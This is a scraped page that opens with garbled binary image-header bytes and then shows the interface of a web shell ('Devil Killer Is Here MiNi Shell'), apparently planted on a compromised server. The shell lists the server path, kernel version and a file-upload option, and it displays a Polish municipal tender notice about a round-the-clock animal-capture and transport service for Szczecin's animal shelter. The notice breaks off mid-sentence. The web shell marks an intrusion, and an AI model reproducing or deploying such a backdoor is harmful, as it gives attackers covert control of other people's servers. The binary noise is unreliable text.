JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231110/0048765501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> II - Prowadzenie całodobowego pogotowia interwencyjnego na rzecz Schroniska dla Bezdomnych Zwierząt w Szczecinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Szczecin - Zakład Usług Komunalnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ku Słońcu 125A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">agnieszka.zadernowska@zuk.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zuk.szczecin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> II - Prowadzenie całodobowego pogotowia interwencyjnego na rzecz Schroniska dla Bezdomnych Zwierząt w Szczecinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6fc7c760-7fac-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00487655</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i<br/>organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej, zostały opisane w Regulaminie Internetowej<br/>Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o. pod adresem: https://platformazakupowa.pl/strona/1-regulamin<br/>2. Instrukcje korzystania z Platformy dotyczące w szczególności składania wniosków o wyjaśnienie treści SWZ, składania ofert,<br/>wysyłania i odbierania dokumentów oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz.<br/>UEL 119 z 04.05.2016, str. 1), zwanego dalej „RODO”, informuję, że: administratorem Pani/Pana danych osobowych jest Zakład<br/>Usług Komunalnych z siedzibą w Szczecinie przy ul. Ku Słońcu 125A;kontakt z Inspektorem Ochrony Danych w Zakładzie Usług<br/>Komunalnych w Szczecinie jest możliwy pod numerem telefonu 91 48 57 132 oraz adresem email:iod@zuk.szczecin.pl, Pani/Pana<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego pn. „II - Prowadzenie całodobowego pogotowia interwencyjnego na rzecz Schroniska dla Bezdomnych<br/>Zwierząt w Szczecinie” prowadzonym w trybie<br/>podstawowym; odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art.18oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r.poz.2019 ze zmianami), dalej<br/>„ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres<br/>obowiązywania umowy w sprawie zamówienia publicznego; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.<br/>Urz. UE L 119 z 04.05.2016, str. 1), zwanego dalej „RODO”, informuję, że: posiada Pani/Pan:− na podstawie<br/>art. 15 RODO prawo dostępu do danych osobowych,− na podstawie art. 16 RODO prawo do sprostowania danych osobowych<br/>(skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu postępowania<br/>oraz jego załączników);− na podstawie art. 18 RODO prawo żądania od zamawiającego ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o<br/>których mowa w art. 18 ust. 2 RODO;− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; nie przysługuje Pani/Panu:− w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit.c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">C/3/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest prowadzenie całodobowego pogotowia interwencyjnego <br/>na rzecz Schroniska dla Bezdomnych Zwierząt w Szczecinie.<br/>Wspólny Słownik Zamówień (CPV) <br/>98300000-6 Różne usługi<br/>98380000-0 Usługi psiarni<br/>2.	Zakres przedmiotu umowy obejmuje m. in.:<br/>1)	odławianie zwierząt (psów i kotów) z terenu Gminy Miasto Szczecin, polegające <br/>na podejmowaniu natychmiastowej interwencji:<br/>a)	w przypadku zdrowych zwierząt – odłowieniu zwierzęcia i przewiezieniu <br/>go do Schroniska dla Bezdomnych Zwierząt w Szczecinie,<br/>b)	w przypadku zwierząt rannych:<br/>	w godzinach 8.00 – 16.00 w dni robocze i soboty - przewiezienie zwierzęcia <br/>do Schroniska dla Bezdomnych Zwierząt w Szczecinie,<br/>	w godzinach 16.00 – 8.00 – przewiezienie zwierzęcia do lecznicy wskazanej przez Zamawiającego i po udzieleniu pierwszej pomocy do Schroniska dla Bezdomnych Zwierząt w Szczecinie (koszt leczenia w lecznicy będzie ponosił Zamawiający),<br/>	całodobowo w niedziele i święta - Wykonawca zobowiązany będzie<br/>do przewiezienia zwierzęcia do lecznicy wskazanej przez Zamawiającego <br/>i po udzieleniu pierwszej pomocy do Schroniska dla Bezdomnych Zwierząt <br/>w Szczecinie (koszt leczenia będzie ponosił Zamawiający),<br/>2)	transport zwierząt z terenu Gminy Miasto Szczecin:<br/>a)	od poniedziałku do soboty w godzinach 8.00 - 16.00 transport zwierząt przebywających w Schronisku dla Bezdomnych Zwierząt w Szczecinie, również <br/>w sytuacjach awaryjnych (np. absencja opieki lekarsko-weterynaryjnej w Schronisku dla Bezdomnych Zwierząt w Szczecinie) do wskazanych gabinetów weterynaryjnych celem przeprowadzenia konsultacji lub wykonania dodatkowych badań (koszt konsultacji i badań dodatkowych będzie ponosił Zamawiający) i z powrotem, <br/>b)	od poniedziałku do soboty w godzinach 16.00 – 8.00, a w niedziele i dni świąteczne całodobowo – transport zwierząt przebywających w Schronisku dla Bezdomnych Zwierząt w Szczecinie do wskazanego gabinetu dyżurującego i z powrotem.<br/>3.	Obowiązki Stron:<br/>1)	Wykonawca zobowiązany będzie do przyjmowania zgłoszeń (obejmujących co najmniej miejsce pobytu zwierzęcia) wyłącznie od służb miejskich (Policja, Dyżurny Techniczny Miasta, Straż Pożarna, Straż Miejska) oraz ze Schroniska dla Bezdomnych Zwierząt w Szczecinie, o konieczności niezwłocznego odłowienia zwierzęcia lub udzielenia pomocy zwierzętom rannym, potrąconym, pogryzionym, błąkającym się bez opieki, agresywnym oraz tym, które stwarzają zagrożenie dla bezpieczeństwa ludzi i zwierząt,<br/>2)	Wykonawca będzie podejmował interwencje tylko po otrzymaniu zgłoszenia <br/>od pracownika Schroniska dla Bezdomnych Zwierząt w Szczecinie lub służb miejskich. Wykonawca zobowiązany będzie niezwłocznie poinformować telefonicznie pracownika Schroniska dla Bezdomnych Zwierząt w Szczecinie o zakończeniu interwencji lub jej nie podjęciu (w przypadku skutecznej interwencji niezwłoczne powiadomienie pracownika Schroniska dla Bezdomnych Zwierząt w Szczecinie o dalszym postępowaniu, <br/>tj. o zamiarze przewiezienia zwierzęcia do Schroniska dla Bezdomnych Zwierząt <br/>w Szczecinie lub do gabinetu weterynaryjnego wskazanego przez Przedstawiciela Zamawiającego, a w przypadku nieskutecznej interwencji – podanie przyczyny braku skuteczności np. brak psa w miejscu wskazanym przez zgłaszającego pracownika Schroniska dla Bezdomnych Zwierząt w Szczecinie lub służby miejskie). Po otrzymaniu od Wykonawcy informacji o konieczności przewiezienia zwierzęcia do gabinetu weterynaryjnego, Zamawiający zobowiązany będzie do poinformowania gabinetu <br/>o wizycie, z wyłączeniem przypadków przewożenia zwierząt w godzinach 16.00 – 8.00 – w tych godzinach Wykonawca zobowiązany będzie do poinformowania gabinetu <br/>o wizycie,<br/>3)	Wykonawca - po otrzymaniu zgłoszenia, o którym mowa w ppkt 1 zobowiązany będzie <br/>do podjęcia natychmiastowej interwencji - nie później niż w ciągu 1 godziny, przy czym podjęcie interwencji oznacza podjęcie działania na miejscu interwencji,<br/>4)	w przypadku konieczności użycia środka nasennego podczas odławiania Wykonawca zobowiązany będzie przeprowadzić interwencję w obecności lekarza weterynarii,<br/>5)	Wykonawca zobowiązany będzie do używania - przy odławianiu bezdomnych zwierząt -urządzeń i środków, które nie stworzą zagrożenia dla ich życia ani nie zadadzą <br/>im cierpienia,<br/>6)	Wykonawca zobowiązany będzie do dostarczenia do Schroniska dla Bezdomnych Zwierząt w Szczecinie odłowionego zwierzęcia w terminie 2 godzin od momentu zakończenia interwencji i niezwłocznego powiadomienia o tym fakcie pracownika Schroniska dla Bezdomnych Zwierząt w Szczecinie, z wyłączeniem przypadków, <br/>w których Wykonawca w pierwszej kolejności będzie przewoził zwierzę do gabinetu weterynaryjnego w celu udzielenia pierwszej pomocy. Wówczas Wykonawca zobowiązany będzie do dostarczenia zwierzęcia do Schroniska dla Bezdomnych Zwierząt w Szczecinie w terminie 2 godzin od zakończenia badania w gabinecie weterynaryjnym i niezwłocznego poinformowania o tym fakcie pracownika Schroniska dla Bezdomnych Zwierząt w Szczecinie,<br/>7)	w przypadku możliwości udostępnienia danych i numeru telefonu osoby zgłaszającej konieczność podjęcia interwencji – Zamawiający zobowiązany będzie do przekazania powyższych Wykonawcy w celu doprecyzowania okoliczności niezbędnych <br/>do przeprowadzenia skutecznej interwencji,<br/>8)	Wykonawca zobowiązany będzie do każdorazowego wpisywania do dokumentacji interwencji (wzór dokumentacji interwencji Zamawiający przekaże Wykonawcy w dniu zawarcia umowy) zgłoszeń przekazywanych przez służby miejskie oraz Schronisko <br/>dla Bezdomnych Zwierząt w Szczecinie; każda zgłoszona interwencja winna być potwierdzona przez jednostkę zgłaszającą (służby miejskie, pracownicy Schroniska dla Bezdomnych Zwierząt w Szczecinie),<br/>9) w przypadku konieczności transportu zwierzęcia przebywającego w Schronisku <br/>dla Bezdomnych Zwierząt w Szczecinie do gabinetu weterynaryjnego, Zamawiający zobowiązany będzie do poinformowania Wykonawcy na minimum 2 godziny przed planowanym wyjazdem o konieczności transportu zwierzęcia na konsultacje lub badania,<br/>10)	Wykonawca zobowiązany będzie do zabezpieczania zwierząt podczas badań <br/>(tj. doprowadzenia zwierzęcia do gabinetu weterynaryjnego i pomocy/przytrzymaniu zwierzęcia przy konsultacji lub badaniu) w gabinetach weterynaryjnych wskazanych przez Przedstawiciela Zamawiającego,<br/>11)	Wykonawca, po przywiezieniu zwierzęcia do wskazanego gabinetu weterynaryjnego i orzeczeniu przez lekarza weterynarii o eutanazji, zobowiązany będzie do odebrania zwłok z gabinetu weterynaryjnego w ciągu 30 minut od dokonania eutanazji <br/>i dostarczeniu ich do chłodni przy Schronisku dla Bezdomnych Zwierząt w Szczecinie, w ciągu 2 godzin od momentu odebrania zwłok z gabinetu weterynaryjnego.<br/>4. Konieczność transportu zwierząt na badania nie zwalnia Wykonawcy z obowiązku<br/> świadczenia usług odławiania.<br/>5. Wykonawca zobowiązany będzie do wykonywania czynności wynikających z umowy<br/> oznakowanymi samochodami.<br/>6. Wykonawca zobowiązany będzie do humanitarnego traktowania zwierząt, zapewnienia<br/> im opieki i ochrony podczas transportu, a także działania w sposób zapewniający<br/> poszanowanie godności innych osób i kulturalnego zachowania.<br/>7. Wykonawca wykona przedmiot zamówienia z najwyższą starannością wymaganą<br/> od podmiotu profesjonalnie świadczącego tego typu usługi, na zasadzie zapewnienia<br/> najwyższej jakości usług oraz zgodności z przepisami prawa powszechnie obowiązującego,<br/> a także ofertą, która będzie stanowiła integralną część umowy.<br/>8. Wykonawca zobowiązany będzie do przestrzegania zasad przetwarzania danych osobowych<br/> i zawarcia umowy według wzoru stanowiącego załącznik nr 6 do SWZ.<br/>9. Wykonawca zobowiązany będzie do zachowania w poufności wszelkich danych, które<br/> uzyskał w trakcie realizacji przedmiotu zamówienia.<br/> 10. Wykonawca zapewni, we flocie pojazdów używanych przy wykonywaniu przedmiotu<br/> zamówienia, co najmniej 10 % udział pojazdów elektrycznych lub pojazdów napędzanych<br/> gazem ziemnym w rozumieniu ustawy z dnia 11 stycznia 2018 r. o elektromobilności<br/> i paliwach alternatywnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98300000-6 - Różne usługi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">98380000-0 - Usługi psiarni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa <br/>w art. 214 ust. 1 pkt 7 ustawy – zamówienia udzielane w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, polegającego <br/>na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego, do 30 % wartości zamówienia podstawowego.<br/>	Zakres usług udzielanych w ramach zamówienia podobnego będzie zgodny z całością lub częścią zakresu usług udzielonych w ramach zakresu zamówienia podstawowego.<br/>	Warunkiem udzielenia zamówienia podobnego będzie brak wykonywania tożsamego zakresu prac na tym samym obiekcie przez innego Wykonawcę.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Wybór oferty najkorzystniejszej, spośród ofert nie podlegających odrzuceniu, zostanie dokonany według następujących kryteriów oceny ofert: <br/><br/>1)	cena – 60 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 60 pkt.<br/>	Sposób przyznania punktów w kryterium „cena” (C): <br/><br/> C = najniższa cena / cena w ofercie ocenianej x 100 pkt x 60 %<br/><br/>2) wysokość kary umownej z tytułu zwłoki w podjęciu interwencji przez Wykonawcę <br/>(czasie dłuższym niż 1 godzina) – 40 %<br/> Wykonawca w tym kryterium może otrzymać maksymalnie 40 pkt.<br/> <br/>Sposób przyznania punktów w kryterium „wysokość kary umownej” (K):<br/><br/>Punkty zostaną przyznane w zależności od wysokości zaproponowanej przez Wykonawcę kary umownej z tytułu zwłoki w podjęciu interwencji przez Wykonawcę (w czasie dłuższym niż 1 godzina), w następujący sposób: <br/>a) jeżeli Wykonawca zaproponuje karę umowną w wysokości 150,00 zł za każdą rozpoczętą godzinę zwłoki – 40 pkt<br/>b) jeżeli Wykonawca zaproponuje karę umowną w wysokości 100,00 zł za każdą rozpoczętą godzinę zwłoki – 20 pkt<br/>c) jeżeli Wykonawca zaproponuje karę umowną w wysokości 50,00 zł za każdą rozpoczętą godzinę zwłoki – 0 pkt<br/><br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości mniejszej niż 50,00 zł, wówczas oferta zostanie odrzucona.<br/>Jeżeli Wykonawca zaproponuje karę umowną w wysokości większej niż 150,00 zł, wówczas do oceny ofert zostanie przyjęta maksymalna wysokość kary umownej, czyli 150,00 zł. <br/><br/> S = C + K<br/><br/>2.	Największa ilość punktów (S) wyliczonych w powyższy sposób decyduje o uznaniu oferty za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczący zdolności technicznej lub zawodowej - minimalny poziom zdolności to:<br/>1)	wykonanie należycie w okresie ostatnich 3 lat, licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednej usługi polegającej na odławianiu i transporcie zwierząt domowych (w tym psów i kotów), wykonywanej przez ciągły okres co 